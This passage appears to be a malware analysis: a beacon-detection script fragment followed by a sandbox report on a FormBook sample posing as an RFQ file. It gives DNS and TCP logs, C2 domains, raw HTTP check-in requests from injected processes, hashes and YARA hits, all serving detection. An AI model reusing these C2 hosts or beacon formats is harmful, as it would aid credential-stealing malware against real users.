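        print(f'{r["src"]}: {r["events"]} connections to {r["distinct_dst"]} hosts, '
              f'base period {r["base_period_s"]}s, median gap {r["median_gap_s"]}s')
```

The gap test is what separates this from a plain fan-out count: a user opening nine web sites also reaches nine hosts on port 80, but not at 20-second multiples with a single connection each. Run it over proxy or NetFlow records rather than IDS alerts and it becomes independent of the GET-URI content match behind SID 2031412.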
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 3, 2024 17:25:55.092230082 CEST | 49709 | 80 | 192.168.2.9 | 188.114.97.3
Jul 3, 2024 17:25:55.097301960 CEST | 80 | 49709 | 188.114.97.3 | 192.168.2.9
Jul 3, 2024 17:25:55.097368956 CEST | 49709 | 80 | 192.168.2.9 | 188.114.97.3
Jul 3, 2024 17:25:55.097430944 CEST | 49709 | 80 | 192.168.2.9 | 188.114.97.3
Jul 3, 2024 17:25:55.102586031 CEST | 80 | 49709 | 188.114.97.3 | 192.168.2.9
Jul 3, 2024 17:25:55.568639040 CEST | 80 | 49709 | 188.114.97.3 | 192.168.2.9
Jul 3, 2024 17:25:55.569356918 CEST | 80 | 49709 | 188.114.97.3 | 192.168.2.9
Jul 3, 2024 17:25:55.569442987 CEST | 49709 | 80 | 192.168.2.9 | 188.114.97.3
Jul 3, 2024 17:25:55.569813013 CEST | 49709 | 80 | 192.168.2.9 | 188.114.97.3
Jul 3, 2024 17:25:55.574826956 CEST | 80 | 49709 | 188.114.97.3 | 192.168.2.9
Jul 3, 2024 17:26:15.349034071 CEST | 49711 | 80 | 192.168.2.9 | 76.223.105.230
Jul 3, 2024 17:26:15.353988886 CEST | 80 | 49711 | 76.223.105.230 | 192.168.2.9
Jul 3, 2024 17:26:15.356364965 CEST | 49711 | 80 | 192.168.2.9 | 76.223.105.230
Jul 3, 2024 17:26:15.356501102 CEST | 49711 | 80 | 192.168.2.9 | 76.223.105.230
Jul 3, 2024 17:26:15.362159967 CEST | 80 | 49711 | 76.223.105.230 | 192.168.2.9
Jul 3, 2024 17:26:15.855173111 CEST | 49711 | 80 | 192.168.2.9 | 76.223.105.230
Jul 3, 2024 17:26:15.855463028 CEST | 80 | 49711 | 76.223.105.230 | 192.168.2.9
Jul 3, 2024 17:26:15.855570078 CEST | 49711 | 80 | 192.168.2.9 | 76.223.105.230
Jul 3, 2024 17:26:15.855854034 CEST | 80 | 49711 | 76.223.105.230 | 192.168.2.9
Jul 3, 2024 17:26:15.855906963 CEST | 49711 | 80 | 192.168.2.9 | 76.223.105.230
Jul 3, 2024 17:26:15.860112906 CEST | 80 | 49711 | 76.223.105.230 | 192.168.2.9
Jul 3, 2024 17:26:15.860171080 CEST | 49711 | 80 | 192.168.2.9 | 76.223.105.230
Jul 3, 2024 17:26:54.925086021 CEST | 49714 | 80 | 192.168.2.9 | 3.64.163.50
Jul 3, 2024 17:26:54.930198908 CEST | 80 | 49714 | 3.64.163.50 | 192.168.2.9
Jul 3, 2024 17:26:54.930263996 CEST | 49714 | 80 | 192.168.2.9 | 3.64.163.50
Jul 3, 2024 17:26:54.930423021 CEST | 49714 | 80 | 192.168.2.9 | 3.64.163.50
Jul 3, 2024 17:26:54.935208082 CEST | 80 | 49714 | 3.64.163.50 | 192.168.2.9
Jul 3, 2024 17:26:55.433221102 CEST | 49714 | 80 | 192.168.2.9 | 3.64.163.50
Jul 3, 2024 17:26:55.438306093 CEST | 80 | 49714 | 3.64.163.50 | 192.168.2.9
Jul 3, 2024 17:26:55.438368082 CEST | 49714 | 80 | 192.168.2.9 | 3.64.163.50
Jul 3, 2024 17:27:15.442362070 CEST | 49715 | 80 | 192.168.2.9 | 185.53.179.91
Jul 3, 2024 17:27:15.447262049 CEST | 80 | 49715 | 185.53.179.91 | 192.168.2.9
Jul 3, 2024 17:27:15.447384119 CEST | 49715 | 80 | 192.168.2.9 | 185.53.179.91
Jul 3, 2024 17:27:15.447591066 CEST | 49715 | 80 | 192.168.2.9 | 185.53.179.91
Jul 3, 2024 17:27:15.452756882 CEST | 80 | 49715 | 185.53.179.91 | 192.168.2.9
Jul 3, 2024 17:27:15.936372042 CEST | 49715 | 80 | 192.168.2.9 | 185.53.179.91
Jul 3, 2024 17:27:15.941962004 CEST | 80 | 49715 | 185.53.179.91 | 192.168.2.9
Jul 3, 2024 17:27:15.944490910 CEST | 49715 | 80 | 192.168.2.9 | 185.53.179.91
Jul 3, 2024 17:27:36.544799089 CEST | 49716 | 80 | 192.168.2.9 | 194.41.37.158
Jul 3, 2024 17:27:36.550411940 CEST | 80 | 49716 | 194.41.37.158 | 192.168.2.9
Jul 3, 2024 17:27:36.550496101 CEST | 49716 | 80 | 192.168.2.9 | 194.41.37.158
Jul 3, 2024 17:27:36.550599098 CEST | 49716 | 80 | 192.168.2.9 | 194.41.37.158
Jul 3, 2024 17:27:36.556301117 CEST | 80 | 49716 | 194.41.37.158 | 192.168.2.9
Jul 3, 2024 17:27:37.058290958 CEST | 49716 | 80 | 192.168.2.9 | 194.41.37.158
Jul 3, 2024 17:27:37.108129978 CEST | 80 | 49716 | 194.41.37.158 | 192.168.2.9
Jul 3, 2024 17:27:37.122683048 CEST | 80 | 49716 | 194.41.37.158 | 192.168.2.9
Jul 3, 2024 17:27:37.122749090 CEST | 49716 | 80 | 192.168.2.9 | 194.41.37.158
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 3, 2024 17:25:55.074827909 CEST | 51092 | 53 | 192.168.2.9 | 1.1.1.1
Jul 3, 2024 17:25:55.091548920 CEST | 53 | 51092 | 1.1.1.1 | 192.168.2.9
Jul 3, 2024 17:26:15.308891058 CEST | 59083 | 53 | 192.168.2.9 | 1.1.1.1
Jul 3, 2024 17:26:15.346124887 CEST | 53 | 59083 | 1.1.1.1 | 192.168.2.9
Jul 3, 2024 17:26:34.263456106 CEST | 55798 | 53 | 192.168.2.9 | 1.1.1.1
Jul 3, 2024 17:26:34.330478907 CEST | 53 | 55798 | 1.1.1.1 | 192.168.2.9
Jul 3, 2024 17:26:54.903444052 CEST | 55135 | 53 | 192.168.2.9 | 1.1.1.1
Jul 3, 2024 17:26:54.924207926 CEST | 53 | 55135 | 1.1.1.1 | 192.168.2.9
Jul 3, 2024 17:27:15.371752024 CEST | 65511 | 53 | 192.168.2.9 | 1.1.1.1
Jul 3, 2024 17:27:15.432128906 CEST | 53 | 65511 | 1.1.1.1 | 192.168.2.9
Jul 3, 2024 17:27:35.903141022 CEST | 62542 | 53 | 192.168.2.9 | 1.1.1.1
Jul 3, 2024 17:27:36.543915033 CEST | 53 | 62542 | 1.1.1.1 | 192.168.2.9
Jul 3, 2024 17:27:56.387062073 CEST | 50166 | 53 | 192.168.2.9 | 1.1.1.1
Jul 3, 2024 17:27:56.966373920 CEST | 53 | 50166 | 1.1.1.1 | 192.168.2.9
Jul 3, 2024 17:28:16.871649027 CEST | 63851 | 53 | 192.168.2.9 | 1.1.1.1
Jul 3, 2024 17:28:17.167802095 CEST | 53 | 63851 | 1.1.1.1 | 192.168.2.9
Jul 3, 2024 17:28:37.358844042 CEST | 63751 | 53 | 192.168.2.9 | 1.1.1.1
Jul 3, 2024 17:28:37.865365982 CEST | 53 | 63751 | 1.1.1.1 | 192.168.2.9
Jul 3, 2024 17:28:58.088654041 CEST | 51153 | 53 | 192.168.2.9 | 1.1.1.1
Jul 3, 2024 17:28:58.223104954 CEST | 53 | 51153 | 1.1.1.1 | 192.168.2.9
Jul 3, 2024 17:29:18.740637064 CEST | 63570 | 53 | 192.168.2.9 | 1.1.1.1
Jul 3, 2024 17:29:18.820117950 CEST | 53 | 63570 | 1.1.1.1 | 192.168.2.9
Jul 3, 2024 17:29:39.387249947 CEST | 60076 | 53 | 192.168.2.9 | 1.1.1.1
Jul 3, 2024 17:29:39.434956074 CEST | 53 | 60076 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 3, 2024 17:25:55.074827909 CEST | 192.168.2.9 | 1.1.1.1 | 0xcb91 | Standard query (0) | www.checkout4xgrow.shop | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:26:15.308891058 CEST | 192.168.2.9 | 1.1.1.1 | 0x2fc6 | Standard query (0) | www.kgstrengthandperformance.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:26:34.263456106 CEST | 192.168.2.9 | 1.1.1.1 | 0x638e | Standard query (0) | www.bvlazaedi.xyz | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:26:54.903444052 CEST | 192.168.2.9 | 1.1.1.1 | 0x7ec8 | Standard query (0) | www.babyscan.xyz | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:27:15.371752024 CEST | 192.168.2.9 | 1.1.1.1 | 0xbf0f | Standard query (0) | www.gb-electric-wheelchairs-8j.bond | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:27:35.903141022 CEST | 192.168.2.9 | 1.1.1.1 | 0x1b0b | Standard query (0) | www.76466.club | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:27:56.387062073 CEST | 192.168.2.9 | 1.1.1.1 | 0xbc0e | Standard query (0) | www.ujgddhhfeffsfgg2.group | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:28:16.871649027 CEST | 192.168.2.9 | 1.1.1.1 | 0xaf16 | Standard query (0) | www.modleavedepts.online | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:28:37.358844042 CEST | 192.168.2.9 | 1.1.1.1 | 0xa961 | Standard query (0) | www.momura.xyz | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:28:58.088654041 CEST | 192.168.2.9 | 1.1.1.1 | 0xe085 | Standard query (0) | www.gas39.pro | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:29:18.740637064 CEST | 192.168.2.9 | 1.1.1.1 | 0xb50a | Standard query (0) | www.00050516.xyz | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:29:39.387249947 CEST | 192.168.2.9 | 1.1.1.1 | 0xfb44 | Standard query (0) | www.topallinoneaccounting.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 3, 2024 17:25:55.091548920 CEST | 1.1.1.1 | 192.168.2.9 | 0xcb91 | No error (0) | www.checkout4xgrow.shop |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:25:55.091548920 CEST | 1.1.1.1 | 192.168.2.9 | 0xcb91 | No error (0) | www.checkout4xgrow.shop |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:26:15.346124887 CEST | 1.1.1.1 | 192.168.2.9 | 0x2fc6 | No error (0) | www.kgstrengthandperformance.com | kgstrengthandperformance.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:26:15.346124887 CEST | 1.1.1.1 | 192.168.2.9 | 0x2fc6 | No error (0) | kgstrengthandperformance.com |  | 76.223.105.230 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:26:15.346124887 CEST | 1.1.1.1 | 192.168.2.9 | 0x2fc6 | No error (0) | kgstrengthandperformance.com |  | 13.248.243.5 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:26:34.330478907 CEST | 1.1.1.1 | 192.168.2.9 | 0x638e | Server failure (2) | www.bvlazaedi.xyz | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:26:54.924207926 CEST | 1.1.1.1 | 192.168.2.9 | 0x7ec8 | No error (0) | www.babyscan.xyz |  | 3.64.163.50 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:27:15.432128906 CEST | 1.1.1.1 | 192.168.2.9 | 0xbf0f | No error (0) | www.gb-electric-wheelchairs-8j.bond |  | 185.53.179.91 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:27:36.543915033 CEST | 1.1.1.1 | 192.168.2.9 | 0x1b0b | No error (0) | www.76466.club | uaslkd.skasdhu.huhusddfnsuegcdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:27:36.543915033 CEST | 1.1.1.1 | 192.168.2.9 | 0x1b0b | No error (0) | uaslkd.skasdhu.huhusddfnsuegcdn.com | gt.huhusddfnsuegcdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:27:36.543915033 CEST | 1.1.1.1 | 192.168.2.9 | 0x1b0b | No error (0) | gt.huhusddfnsuegcdn.com |  | 194.41.37.158 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:27:36.543915033 CEST | 1.1.1.1 | 192.168.2.9 | 0x1b0b | No error (0) | gt.huhusddfnsuegcdn.com |  | 194.41.37.181 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:27:36.543915033 CEST | 1.1.1.1 | 192.168.2.9 | 0x1b0b | No error (0) | gt.huhusddfnsuegcdn.com |  | 194.41.37.193 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:27:36.543915033 CEST | 1.1.1.1 | 192.168.2.9 | 0x1b0b | No error (0) | gt.huhusddfnsuegcdn.com |  | 194.41.37.192 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:27:36.543915033 CEST | 1.1.1.1 | 192.168.2.9 | 0x1b0b | No error (0) | gt.huhusddfnsuegcdn.com |  | 194.41.37.156 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:27:36.543915033 CEST | 1.1.1.1 | 192.168.2.9 | 0x1b0b | No error (0) | gt.huhusddfnsuegcdn.com |  | 194.41.37.190 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:27:56.966373920 CEST | 1.1.1.1 | 192.168.2.9 | 0xbc0e | Name error (3) | www.ujgddhhfeffsfgg2.group | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:28:17.167802095 CEST | 1.1.1.1 | 192.168.2.9 | 0xaf16 | No error (0) | www.modleavedepts.online | modleavedepts.online |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:28:17.167802095 CEST | 1.1.1.1 | 192.168.2.9 | 0xaf16 | No error (0) | modleavedepts.online |  | 104.194.9.178 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:28:37.865365982 CEST | 1.1.1.1 | 192.168.2.9 | 0xa961 | No error (0) | www.momura.xyz | edge.redirect.pizza |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:28:37.865365982 CEST | 1.1.1.1 | 192.168.2.9 | 0xa961 | No error (0) | edge.redirect.pizza |  | 89.106.200.1 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:28:58.223104954 CEST | 1.1.1.1 | 192.168.2.9 | 0xe085 | No error (0) | www.gas39.pro | gas39.pro |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:29:18.820117950 CEST | 1.1.1.1 | 192.168.2.9 | 0xb50a | No error (0) | www.00050516.xyz | 00050516.xyz |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 17:29:18.820117950 CEST | 1.1.1.1 | 192.168.2.9 | 0xb50a | No error (0) | 00050516.xyz |  | 65.21.196.90 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:29:39.434956074 CEST | 1.1.1.1 | 192.168.2.9 | 0xfb44 | No error (0) | www.topallinoneaccounting.com |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 17:29:39.434956074 CEST | 1.1.1.1 | 192.168.2.9 | 0xfb44 | No error (0) | www.topallinoneaccounting.com |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                            • www.checkout4xgrow.shop
                                            • www.kgstrengthandperformance.com
                                            • www.babyscan.xyz
                                            • www.gb-electric-wheelchairs-8j.bond
                                            • www.76466.club
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49709 | 188.114.97.3 | 80 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:25:55.097430944 CEST | 173 | OUT | GET /ts59/?S0GhCH=DR-Lh8FH5BP&Upql=F3s9qclS9ajlyltz5vx8YuFcODa05tGO2XwI753moUwU8ctXmF/lD/LedP+MQBQFZjkX HTTP/1.1
                                            Host: www.checkout4xgrow.shop
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
Jul 3, 2024 17:25:55.568639040 CEST | 931 | IN | HTTP/1.1 301 Moved Permanently
                                            Date: Wed, 03 Jul 2024 15:25:55 GMT
                                            Content-Type: text/html
                                            Content-Length: 167
                                            Connection: close
                                            Cache-Control: max-age=3600
                                            Expires: Wed, 03 Jul 2024 16:25:55 GMT
                                            Location: https://www.checkout4xgrow.shop/ts59/?S0GhCH=DR-Lh8FH5BP&Upql=F3s9qclS9ajlyltz5vx8YuFcODa05tGO2XwI753moUwU8ctXmF/lD/LedP+MQBQFZjkX
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s46z74UkM0VhpB4bctNiU9Fzz2YE%2BPIbW54INbvTf4FMqS4hqrXR5QHDHHLlB8IkOq72Cp2vJZLS%2FxVz41ymJW33kZcqbqVwvu6k4r295qV7Hbo5FZRPFRUnFK3ZyliSeHb9uZsmYJt5jg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 89d7e415ed177c87-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49711 | 76.223.105.230 | 80 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:26:15.356501102 CEST | 182 | OUT | GET /ts59/?Upql=FhTWpBv2wlHh+xqdnZr3Px/MyxZeSSML3WZDSneysGfSXRBJ9ZV2+MGZCGSdE3MN2wai&S0GhCH=DR-Lh8FH5BP HTTP/1.1
                                            Host: www.kgstrengthandperformance.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
Jul 3, 2024 17:26:15.855463028 CEST | 431 | IN | HTTP/1.1 301 Moved Permanently
                                            location: https://kgstrengthandperformance.com/ts59/?Upql=FhTWpBv2wlHh+xqdnZr3Px/MyxZeSSML3WZDSneysGfSXRBJ9ZV2+MGZCGSdE3MN2wai&S0GhCH=DR-Lh8FH5BP
                                            vary: Accept-Encoding
                                            server: DPS/2.0.0+sha-aaf97e5
                                            x-version: aaf97e5
                                            x-siteid: us-east-1
                                            set-cookie: dps_site_id=us-east-1; path=/
                                            date: Wed, 03 Jul 2024 15:26:15 GMT
                                            keep-alive: timeout=5
                                            transfer-encoding: chunked
                                            connection: close
                                            Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49714 | 3.64.163.50 | 80 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:26:54.930423021 CEST | 166 | OUT | GET /ts59/?Upql=Q0rerqlMM+Mzf1m4EVXcVVXnMVAfvTa9yYuOwxw9IZ3XTRGu1uzNDOvhpqi9CeNRWR+i&S0GhCH=DR-Lh8FH5BP HTTP/1.1
                                            Host: www.babyscan.xyz
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49715 | 185.53.179.91 | 80 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:27:15.447591066 CEST | 185 | OUT | GET /ts59/?S0GhCH=DR-Lh8FH5BP&Upql=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVrOgvyVjJmhQ HTTP/1.1
                                            Host: www.gb-electric-wheelchairs-8j.bond
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49716 | 194.41.37.158 | 80 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:27:36.550599098 CEST | 164 | OUT | GET /ts59/?Upql=eOJ5wRfCg8ODtwLT+RxU2vRwj/ifTX9ZHMiqr0Mmp4jM1anHRZ8cLTgQ01aLoU+CLIq0&S0GhCH=DR-Lh8FH5BP HTTP/1.1
                                            Host: www.76466.club
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


Target ID: 1
Start time: 11:25:16
Start date: 03/07/2024
Path: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe"
Imagebase: 0xe0000
File size: 1'081'856 bytes
MD5 hash: 11AB7D8A50CCAFBB4D7B5C9E83E4FF4C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low
Has exited: true

Target ID: 2
Start time: 11:25:17
Start date: 03/07/2024
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe"
Imagebase: 0x650000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate
Has exited: true

Target ID: 3
Start time: 11:25:18
Start date: 03/07/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff633410000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 11:25:19
Start date: 03/07/2024
Path: C:\Windows\SysWOW64\systray.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\systray.exe"
Imagebase: 0x670000
File size: 9'728 bytes
MD5 hash: 28D565BB24D30E5E3DE8AFF6900AF098
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
